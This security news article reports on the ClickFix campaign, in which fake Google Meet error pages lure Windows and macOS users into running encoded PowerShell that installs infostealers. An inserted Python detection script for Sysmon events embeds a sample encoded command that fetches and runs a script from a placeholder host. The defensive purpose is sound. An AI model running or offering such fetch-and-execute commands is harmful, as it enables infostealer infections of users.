Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed ClickFix to deliver infostealers targeting Windows and macOS systems.
"This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems," French cybersecurity company Sekoia said in a report shared with The Hacker News.
Variations of the ClickFix (aka ClearFake and OneDrive Pastejacking) campaign have been reported widely in recent months, with threat actors employing different lures to redirect users to bogus pages that aim to deploy malware by urging site visitors to run an encoded PowerShell command to fix a supposed issue with displaying content in the web browser.
These pages are known to masquerade as popular online services, including Facebook, Google Chrome, PDFSimpli, and reCAPTCHA, and now Google Meet as well as possibly Zoom.
On Windows, the attack chain culminates in the deployment of the StealC and Rhadamanthys stealers, while Apple macOS users are served a booby-trapped disk image file ("Launcher_v1.94.dmg") that drops another stealer known as Atomic.
This emerging social engineering tactic is notable because it evades detection by security tools: the user manually runs the malicious PowerShell command directly in the terminal, rather than the command being invoked automatically by a payload the user downloaded and executed.
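As an added example (not code from the Sekoia report or this article), here is the kind of detection logic a defender can run over process-creation telemetry for the pattern just described: PowerShell started from an interactive parent such as explorer.exe with an encoded command whose decoded body fetches and evaluates remote content. The parent-process set, the regexes and the Sysmon-style sample records (with the placeholder host example.invalid) are assumptions constructed for this example.

```python
import base64
import re

# Interactive parents a pasted command is typically run from (assumption for this example).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
# Matches the encoded-command switch and captures its base64 argument.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Behaviours of a one-liner that fetches and evaluates a second stage.
SUSPICIOUS = re.compile(r"iwr|invoke-webrequest|downloadstring|iex|invoke-expression|https?://", re.I)

def decode_encoded_command(command_line: str) -> str:
    """Return the decoded -EncodedCommand body (base64 of UTF-16LE), or "" if absent or invalid."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def is_clickfix_like(event: dict) -> bool:
    """True when PowerShell is launched from an interactive parent with an encoded
    command whose decoded body downloads or evaluates remote content."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in {"powershell.exe", "pwsh.exe"} or parent not in INTERACTIVE_PARENTS:
        return False
    decoded = decode_encoded_command(event["CommandLine"])
    return bool(decoded) and SUSPICIOUS.search(decoded) is not None

def find_clickfix_events(events: list) -> list:
    """UtcTime of every process-creation record that matches the pattern."""
    return [e["UtcTime"] for e in events if is_clickfix_like(e)]

def _enc(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used only to build the samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed Sysmon-style Event ID 1 records; example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    {"UtcTime": "2024-10-17 09:12:01", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -w hidden -enc " + _enc("iex (iwr https://example.invalid/s.ps1)")},
    {"UtcTime": "2024-10-17 09:15:44", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -enc " + _enc("Get-Date")},  # encoded but harmless body
    {"UtcTime": "2024-10-17 09:20:10", "ParentImage": r"C:\Program Files\Agent\agent.exe", "Image": PS,
     "CommandLine": "powershell -enc " + _enc("iex (iwr https://example.invalid/x)")},  # not user-pasted
]
```

Only the first record is flagged: the second has an encoded but benign body, and the third was spawned by a non-interactive parent, which is the case other rules (or a dropped-binary detection) should cover.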
Sekoia has attributed the cluster impersonating Google Meet to two traffers groups, namely Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo, which are sub-teams within markopolo and CryptoLove, respectively.
"Both traffers teams [...] use the same ClickFix template that impersonates Google Meet," Sekoia said. "This discovery suggests that these teams share materials, also known as 'landing project,' as well as infrastructure."
This, in turn, has raised the possibility that both threat groups are making use of the same, as-yet-unknown cybercrime service, with a third party likely managing their infrastructure.
The development comes amid the emergence of malware campaigns distributing the open-source ThunderKitty stealer, which shares overlaps with Skuld and Kematian Stealer, as well as new stealer families named Divulge, DedSec (aka Doenerium), Duck, Vilsa, and Yunit.
"The rise of open-source infostealers represents a significant shift in the world of cyber threats," cybersecurity company Hudson Rock noted back in July 2024.
"By lowering the barrier of entry and fostering rapid innovation, these tools could fuel a new wave of computer infections, posing challenges for cybersecurity professionals and increasing the overall risk to businesses and individuals."